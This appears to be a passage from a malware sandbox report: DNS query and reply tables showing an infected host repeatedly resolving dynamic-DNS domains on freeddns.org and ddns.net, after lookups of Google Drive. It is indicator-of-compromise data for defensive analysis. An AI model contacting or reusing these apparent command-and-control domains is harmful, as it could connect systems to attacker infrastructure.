                                                                                                Nov 30, 2024 21:21:17.114682913 CET192.168.2.41.1.1.10x9b03Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:18.940857887 CET192.168.2.41.1.1.10x254eStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:19.957072020 CET192.168.2.41.1.1.10xb92cStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:20.911865950 CET192.168.2.41.1.1.10xd288Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:21.060028076 CET192.168.2.41.1.1.10x47a9Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:21.925966024 CET192.168.2.41.1.1.10xb4fcStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:24.051876068 CET192.168.2.41.1.1.10xa95Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:24.958461046 CET192.168.2.41.1.1.10x3a30Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:26.003395081 CET192.168.2.41.1.1.10xebcStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:26.142193079 CET192.168.2.41.1.1.10x9de0Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:26.914160967 CET192.168.2.41.1.1.10x34e2Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:28.894304991 CET192.168.2.41.1.1.10x9b27Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:29.909570932 CET192.168.2.41.1.1.10x5fafStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:30.894481897 CET192.168.2.41.1.1.10xa492Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:31.042433977 CET192.168.2.41.1.1.10x1ec7Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:31.894876003 CET192.168.2.41.1.1.10xfbb6Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:33.894922018 CET192.168.2.41.1.1.10x8e56Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:34.894846916 CET192.168.2.41.1.1.10x932bStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:35.895925999 CET192.168.2.41.1.1.10x4785Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:36.037107944 CET192.168.2.41.1.1.10xd33bStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:36.899306059 CET192.168.2.41.1.1.10xd468Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:38.894054890 CET192.168.2.41.1.1.10x7ee4Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:39.894634008 CET192.168.2.41.1.1.10x27a3Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:40.893779993 CET192.168.2.41.1.1.10xbe05Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:41.032602072 CET192.168.2.41.1.1.10x76d0Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:41.897578001 CET192.168.2.41.1.1.10x752Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:43.893748999 CET192.168.2.41.1.1.10x3a84Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:44.893963099 CET192.168.2.41.1.1.10x3fbfStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:45.894664049 CET192.168.2.41.1.1.10x7c02Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:46.033447981 CET192.168.2.41.1.1.10x209Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:46.893852949 CET192.168.2.41.1.1.10xed04Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:48.895332098 CET192.168.2.41.1.1.10x8b51Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:49.894217014 CET192.168.2.41.1.1.10x7e08Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:50.893872976 CET192.168.2.41.1.1.10xa315Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:51.032885075 CET192.168.2.41.1.1.10xc7c1Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:51.893728018 CET192.168.2.41.1.1.10x40f6Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:53.899760962 CET192.168.2.41.1.1.10x1d59Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:54.894948006 CET192.168.2.41.1.1.10x88f8Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:55.976394892 CET192.168.2.41.1.1.10xbd33Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:56.174391031 CET192.168.2.41.1.1.10x1d43Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:56.894635916 CET192.168.2.41.1.1.10xa047Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:58.894963026 CET192.168.2.41.1.1.10x398eStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:21:59.894376040 CET192.168.2.41.1.1.10xf74dStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:00.894511938 CET192.168.2.41.1.1.10x6e28Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:01.033885956 CET192.168.2.41.1.1.10x7091Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:01.894428015 CET192.168.2.41.1.1.10xa8dStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:03.896915913 CET192.168.2.41.1.1.10x2836Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:04.894059896 CET192.168.2.41.1.1.10x3dccStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:05.893786907 CET192.168.2.41.1.1.10x2a59Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:06.033982992 CET192.168.2.41.1.1.10x6b64Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:06.894414902 CET192.168.2.41.1.1.10x85bcStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:08.954592943 CET192.168.2.41.1.1.10xfb01Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:09.893695116 CET192.168.2.41.1.1.10x58fStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:10.893994093 CET192.168.2.41.1.1.10x3810Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:11.038041115 CET192.168.2.41.1.1.10x159dStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:11.907481909 CET192.168.2.41.1.1.10x6e51Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:13.894856930 CET192.168.2.41.1.1.10x7e0dStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:14.895778894 CET192.168.2.41.1.1.10x68fcStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:16.047391891 CET192.168.2.41.1.1.10x71e2Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:16.186364889 CET192.168.2.41.1.1.10x4949Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:16.894490957 CET192.168.2.41.1.1.10xf191Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:18.971487045 CET192.168.2.41.1.1.10xf322Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:19.894455910 CET192.168.2.41.1.1.10xddcfStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:20.894190073 CET192.168.2.41.1.1.10x529aStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:21.034493923 CET192.168.2.41.1.1.10xb927Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:21.894244909 CET192.168.2.41.1.1.10x6ba0Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:23.894102097 CET192.168.2.41.1.1.10x36e9Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:24.893747091 CET192.168.2.41.1.1.10x42d2Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:25.897209883 CET192.168.2.41.1.1.10xd564Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:26.039719105 CET192.168.2.41.1.1.10x7c57Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:26.895644903 CET192.168.2.41.1.1.10xb41cStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:28.894454956 CET192.168.2.41.1.1.10x672aStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:29.894033909 CET192.168.2.41.1.1.10xe7abStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:30.893975973 CET192.168.2.41.1.1.10xb283Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:31.032670975 CET192.168.2.41.1.1.10x3426Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:31.896282911 CET192.168.2.41.1.1.10xb226Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:33.901356936 CET192.168.2.41.1.1.10x762eStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:34.897907019 CET192.168.2.41.1.1.10x733bStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:35.894407988 CET192.168.2.41.1.1.10xb06bStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:36.033179998 CET192.168.2.41.1.1.10xb5f4Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:36.893930912 CET192.168.2.41.1.1.10xfe1eStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:38.896024942 CET192.168.2.41.1.1.10x9951Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:39.893729925 CET192.168.2.41.1.1.10xc1d2Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:41.044411898 CET192.168.2.41.1.1.10xc02dStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:41.208519936 CET192.168.2.41.1.1.10x294fStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:41.894480944 CET192.168.2.41.1.1.10x6ae2Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:44.160908937 CET192.168.2.41.1.1.10xfaabStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:44.894124985 CET192.168.2.41.1.1.10x483Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:45.894345045 CET192.168.2.41.1.1.10xe8c3Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:46.032603025 CET192.168.2.41.1.1.10xa0e8Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:46.894747972 CET192.168.2.41.1.1.10xfccbStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:48.894639969 CET192.168.2.41.1.1.10x2538Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:49.894375086 CET192.168.2.41.1.1.10x7d25Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:50.894263983 CET192.168.2.41.1.1.10xdd42Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:51.033308029 CET192.168.2.41.1.1.10x8159Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:51.174865007 CET192.168.2.41.1.1.10x8159Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:51.893868923 CET192.168.2.41.1.1.10x3a4fStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:53.895992041 CET192.168.2.41.1.1.10xb2afStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:54.894814014 CET192.168.2.41.1.1.10xe212Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:55.893929958 CET192.168.2.41.1.1.10x8c6Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:56.032218933 CET192.168.2.41.1.1.10x3d1cStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:56.894174099 CET192.168.2.41.1.1.10xe5f5Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:58.987997055 CET192.168.2.41.1.1.10xba9dStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:22:59.893984079 CET192.168.2.41.1.1.10x4e24Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:00.893949032 CET192.168.2.41.1.1.10x604fStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:01.039454937 CET192.168.2.41.1.1.10xd1a1Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:02.390722036 CET192.168.2.41.1.1.10xb5b1Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:03.895972967 CET192.168.2.41.1.1.10x85e5Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:05.071913004 CET192.168.2.41.1.1.10xb130Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:05.900295973 CET192.168.2.41.1.1.10x8bb8Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:06.042884111 CET192.168.2.41.1.1.10x64d5Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:06.894731045 CET192.168.2.41.1.1.10x833eStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:08.893817902 CET192.168.2.41.1.1.10x5bd1Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:09.894622087 CET192.168.2.41.1.1.10xfdf3Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:10.894462109 CET192.168.2.41.1.1.10xb20Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:11.033781052 CET192.168.2.41.1.1.10x3a7eStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:11.893923998 CET192.168.2.41.1.1.10x61f6Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:13.894675970 CET192.168.2.41.1.1.10xfbb3Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:14.921612978 CET192.168.2.41.1.1.10x4ba0Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:15.893888950 CET192.168.2.41.1.1.10xd4d3Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:16.033884048 CET192.168.2.41.1.1.10x2f68Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:16.174874067 CET192.168.2.41.1.1.10x2f68Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:16.894491911 CET192.168.2.41.1.1.10x577dStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:18.894267082 CET192.168.2.41.1.1.10x5eceStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:19.894587040 CET192.168.2.41.1.1.10xceedStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:20.912005901 CET192.168.2.41.1.1.10xfcd0Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:21.056905985 CET192.168.2.41.1.1.10xcfa7Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:21.894498110 CET192.168.2.41.1.1.10xdd36Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:23.894733906 CET192.168.2.41.1.1.10xccebStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:24.897948027 CET192.168.2.41.1.1.10x9ffeStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:25.893898010 CET192.168.2.41.1.1.10xccbdStandard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:26.032262087 CET192.168.2.41.1.1.10x371fStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:26.896938086 CET192.168.2.41.1.1.10xf41bStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:28.894193888 CET192.168.2.41.1.1.10x174aStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:29.893872976 CET192.168.2.41.1.1.10x547aStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:31.042069912 CET192.168.2.41.1.1.10x86e2Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:31.323503017 CET192.168.2.41.1.1.10x2510Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:31.897393942 CET192.168.2.41.1.1.10x2ddfStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:33.917188883 CET192.168.2.41.1.1.10x38f1Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:34.898171902 CET192.168.2.41.1.1.10xc492Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:35.904215097 CET192.168.2.41.1.1.10xe170Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:36.042309999 CET192.168.2.41.1.1.10xc761Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:36.893954039 CET192.168.2.41.1.1.10xcdb8Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:38.894542933 CET192.168.2.41.1.1.10xf80fStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:39.894397974 CET192.168.2.41.1.1.10x2afdStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:40.894722939 CET192.168.2.41.1.1.10xe0e5Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:41.034581900 CET192.168.2.41.1.1.10x63f7Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:41.894500971 CET192.168.2.41.1.1.10xcdbStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:43.894792080 CET192.168.2.41.1.1.10x5cb0Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:44.912839890 CET192.168.2.41.1.1.10x8eefStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:45.894596100 CET192.168.2.41.1.1.10x4155Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:46.033504963 CET192.168.2.41.1.1.10x3b9Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:46.896095991 CET192.168.2.41.1.1.10xe3c7Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:48.895133972 CET192.168.2.41.1.1.10xa730Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:49.894546986 CET192.168.2.41.1.1.10x68a8Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:50.933762074 CET192.168.2.41.1.1.10x5517Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:51.089996099 CET192.168.2.41.1.1.10x2069Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:51.894078016 CET192.168.2.41.1.1.10x3d7aStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:53.967255116 CET192.168.2.41.1.1.10x1ed6Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:54.894319057 CET192.168.2.41.1.1.10x7ef3Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:55.896119118 CET192.168.2.41.1.1.10x7764Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:56.039056063 CET192.168.2.41.1.1.10x80c5Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:56.894437075 CET192.168.2.41.1.1.10x4a66Standard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:58.894309998 CET192.168.2.41.1.1.10xb63Standard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:23:59.893861055 CET192.168.2.41.1.1.10x4fffStandard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:00.894426107 CET192.168.2.41.1.1.10x8570Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:01.032838106 CET192.168.2.41.1.1.10xca7aStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:01.175004959 CET192.168.2.41.1.1.10xca7aStandard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:01.894547939 CET192.168.2.41.1.1.10x17abStandard query (0)meetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:06.316018105 CET192.168.2.41.1.1.10x3dbStandard query (0)freshmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:06.455260038 CET192.168.2.41.1.1.10xf647Standard query (0)freshmysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:06.593436956 CET192.168.2.41.1.1.10xd476Standard query (0)mysweeterbk.ddns.netA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:24:06.733108044 CET192.168.2.41.1.1.10xe7e3Standard query (0)bbhmeetre1ms.freeddns.orgA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 30, 2024 21:19:58.926681995 CET1.1.1.1192.168.2.40x56e2No error (0)drive.google.com172.217.19.238A (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:02.014686108 CET1.1.1.1192.168.2.40xfb50No error (0)drive.usercontent.google.com142.250.181.33A (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:13.919034958 CET1.1.1.1192.168.2.40xe2eeName error (3)freshmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:14.726340055 CET1.1.1.1192.168.2.40xb7b2Name error (3)bbhmeetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:14.956677914 CET1.1.1.1192.168.2.40x953aNo error (0)myumysmeetr.ddns.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                Nov 30, 2024 21:20:15.286494970 CET1.1.1.1192.168.2.40xd80bName error (3)meetre1ms.freeddns.orgnonenoneA (IP address)IN (0x0001)false
